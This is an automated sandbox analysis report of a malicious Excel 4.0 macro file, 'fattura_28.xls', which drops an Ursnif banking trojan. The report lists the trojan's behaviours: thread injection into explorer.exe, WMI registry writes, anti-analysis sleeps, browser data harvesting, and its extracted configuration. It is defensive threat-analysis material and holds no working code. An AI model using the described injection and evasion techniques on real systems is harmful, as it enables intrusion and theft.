Source: C:\ProgramData\sodxnes.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 2_2_05601B0F
Yara detected Ursnif
Source: Yara match | File source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Found Excel 4.0 Macro with suspicious formulas
Source: fattura_28.xls | Initial sample: CALL
Source: fattura_28.xls | Initial sample: CALL
Found obfuscated Excel 4.0 Macro
Source: fattura_28.xls | Initial sample: High usage of CHAR() function: 149
Writes or reads registry keys via WMI
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::CreateKey
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exe | WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00401360 GetProcAddress,NtCreateSection,memset
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00401FF6 KiUserExceptionDispatcher,GetLastError,NtClose
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_004020BE NtMapViewOfSection
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00226CD0 NtCreateSection,memset
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00221531 memcpy,memset,GetModuleHandleA,GetProcAddress,GetLastError,HeapFree,NtClose
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00223B04 NtMapViewOfSection
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00223DCC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F8D84 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560CF5E NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05609625 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FEE8C LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560D975 memset,memcpy,NtSetContextThread,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FF000 NtMapViewOfSection
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560D89A NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F3272 GetProcAddress,NtCreateSection,memset
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F3A19 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_056062E7 NtReadVirtualMemory,NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FC585 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05605E3C NtGetContextThread,RtlNtStatusToDosError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560C9B3 CreateEventA,WaitForSingleObject,DisconnectNamedPipe,ConnectNamedPipe,GetLastError,WaitForMultipleObjects,FlushFileBuffers,DisconnectNamedPipe,WaitForSingleObject,CloseHandle,GetLastError,CloseHandle,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F587E NtQueryInformationProcess
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FEA7F memset,NtQueryInformationProcess
Contains functionality to launch a process as a different user
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05606920 CreateProcessAsUserA
Detected potential crypto function
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00224317
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0022A96C
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_002261CC
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0041164B
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00416E66
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0041827A
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00411E05
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00410E18
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00411A1D
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00412A3C
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_004112AD
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00416915
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_004163C4
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F6F17
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_056076C2
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05610984
Classification label
Source: classification engine | Classification label: mal100.phis.bank.troj.spyw.expl.evad.winXLS@19/56@10/4
Contains functionality to enum processes or threads
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FA382 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_002260A2 CoCreateInstance,CoSetProxyBlanket
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$fattura_28.xls
Creates mutexes
Source: C:\ProgramData\sodxnes.exe | Mutant created: \Sessions\1\BaseNamedObjects\{93034449-D6B3-3D59-7877-6AC12C9B3E85}
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDAE3.tmp
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Source: fattura_28.xls | OLE indicator, Workbook stream: true
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample might require command line arguments
Source: sodxnes.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\ProgramData\sodxnes.exe 'C:\ProgramData\sodxnes.exe'
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Windows\System32\ie4uinit.exe 'C:\Windows\System32\ie4uinit.exe' -ShowQLIcon
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2120 CREDAT:275457 /prefetch:2
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2412 CREDAT:275457 /prefetch:2
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2792 CREDAT:275457 /prefetch:2
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\ProgramData\sodxnes.exe 'C:\ProgramData\sodxnes.exe'
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Windows\System32\ie4uinit.exe 'C:\Windows\System32\ie4uinit.exe' -ShowQLIcon
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2120 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2412 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2792 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Uses an in-process (OLE) Automation server
Source: C:\ProgramData\sodxnes.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Writes ini files
Source: C:\Windows\System32\ie4uinit.exe | File written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Document has a 'vbamacros' value indicative of goodware
Source: fattura_28.xls | Initial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodware
Source: fattura_28.xls | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\ProgramData\sodxnes.exe | Unpacked PE file: 2.2.sodxnes.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\ProgramData\sodxnes.exe | Unpacked PE file: 2.2.sodxnes.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05609C37 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0022A95B push ecx; ret 2_2_0022A96B
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0022A5A0 push ecx; ret 2_2_0022A5A9
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026E819 push eax; iretd 2_2_0026E81F
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026FA48 push es; iretd 2_2_0026FA53
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026FCBE push cs; ret 2_2_0026FCBF
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026A689 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026A689 push esi; iretd 2_2_0026A7F1
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026A705 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026EB5E push edx; iretd 2_2_0026EB62
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00269B80 push es; ret 2_2_00269B87
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026A780 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0026A78F push esi; iretd 2_2_0026A7F1
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05610470 push ecx; ret 2_2_05610479
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05610973 push ecx; ret 2_2_05610983

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sodxnes.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ie4uinit.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\sodxnes.exe | Window / User API: threadDelayed 771
Found evasive API chain (date check)
Source: C:\ProgramData\sodxnes.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\ProgramData\sodxnes.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\ProgramData\sodxnes.exe TID: 2212 | Thread sleep count: 771 > 30
Source: C:\ProgramData\sodxnes.exe TID: 2212 | Thread sleep time: -46260000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00225632 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05606656 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F284E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560DB2F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560B299 wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05604342 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
Enumerates the file system
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Queries a list of all running processes
Source: C:\Windows\explorer.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FEE8C LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05609C37 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to read the PEB
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_001D092B mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_001D0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00267C7B push dword ptr fs:[00000030h]
Contains functionality to register its own exception handler
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00401B9B InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_001D1DEB RtlInitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055FD10E StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\ProgramData\sodxnes.exe | Memory allocated: C:\Windows\explorer.exe base: 710000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\ProgramData\sodxnes.exe | Thread created: C:\Windows\explorer.exe EIP: 76F3F515
Injects code into the Windows Explorer (explorer.exe)
Source: C:\ProgramData\sodxnes.exe | Memory written: PID: 1216 base: 76F3F515 value: EB
Source: C:\ProgramData\sodxnes.exe | Memory written: PID: 1216 base: 710000 value: 15
Source: C:\ProgramData\sodxnes.exe | Memory written: PID: 1216 base: 76F3F515 value: 8B
Maps a DLL or memory area into another process
Source: C:\ProgramData\sodxnes.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\ProgramData\sodxnes.exe | Thread register set: target process: 1216
Writes to foreign memory regions
Source: C:\ProgramData\sodxnes.exe | Memory written: C:\Windows\explorer.exe base: 76F3F515
Source: C:\ProgramData\sodxnes.exe | Memory written: C:\Windows\explorer.exe base: 710000
Source: C:\ProgramData\sodxnes.exe | Memory written: C:\Windows\explorer.exe base: 76F3F515
Yara detected password protected xls with embedded macros
Source: Yara match | File source: fattura_28.xls, type: SAMPLE
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.1276986093.0087D000.00000004.00000020.sdmp | Binary or memory string: ProgmanpD

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\ProgramData\sodxnes.exe  Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s, 2_2_00410C27
Source: C:\ProgramData\sodxnes.exe  Code function: __crtGetLocaleInfoA_stat, 2_2_00414628
Source: C:\ProgramData\sodxnes.exe  Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 2_2_00410AC4
Source: C:\ProgramData\sodxnes.exe  Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_004106FC
Source: C:\ProgramData\sodxnes.exe  Code function: GetLocaleInfoW,_GetPrimaryLen, 2_2_00410898
Source: C:\ProgramData\sodxnes.exe  Code function: _GetPrimaryLen,EnumSystemLocalesA, 2_2_00410BEB
Source: C:\ProgramData\sodxnes.exe  Code function: _LcidFromHexString,GetLocaleInfoA, 2_2_004107F1
Source: C:\ProgramData\sodxnes.exe  Code function: _GetPrimaryLen,EnumSystemLocalesA, 2_2_00410B84
Contains functionality to query CPU information (cpuid)
Source: C:\ProgramData\sodxnes.exe  Code function: 2_2_00221341 cpuid 2_2_00221341
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\ie4uinit.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\ie4uinit.exe  Queries volume information: C:\Program Files\Internet Explorer\iexplore.exe VolumeInformation
Contains functionality to create pipes for IPC
Source: C:\ProgramData\sodxnes.exe  Code function: 2_2_05604C3A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_05604C3A
Contains functionality to query local / system time
Source: C:\ProgramData\sodxnes.exe  Code function: 2_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 2_2_004016D4
Contains functionality to query the account / user name
Source: C:\ProgramData\sodxnes.exe  Code function: 2_2_00221341 GetUserNameW,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,HeapFree, 2_2_00221341
Contains functionality to query Windows version
Source: C:\ProgramData\sodxnes.exe  Code function: 2_2_004018A2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 2_2_004018A2
Queries the cryptographic machine GUID
Source: C:\ProgramData\sodxnes.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe  File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\prefs.js

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match  File source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\prefs.js

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match  File source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "214131", "uptime": "352JJn", "crc": "3", "id": "8585", "user": "be6bfbbc04b2ebbcc45396fdb578e911", "soft": "3"}

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet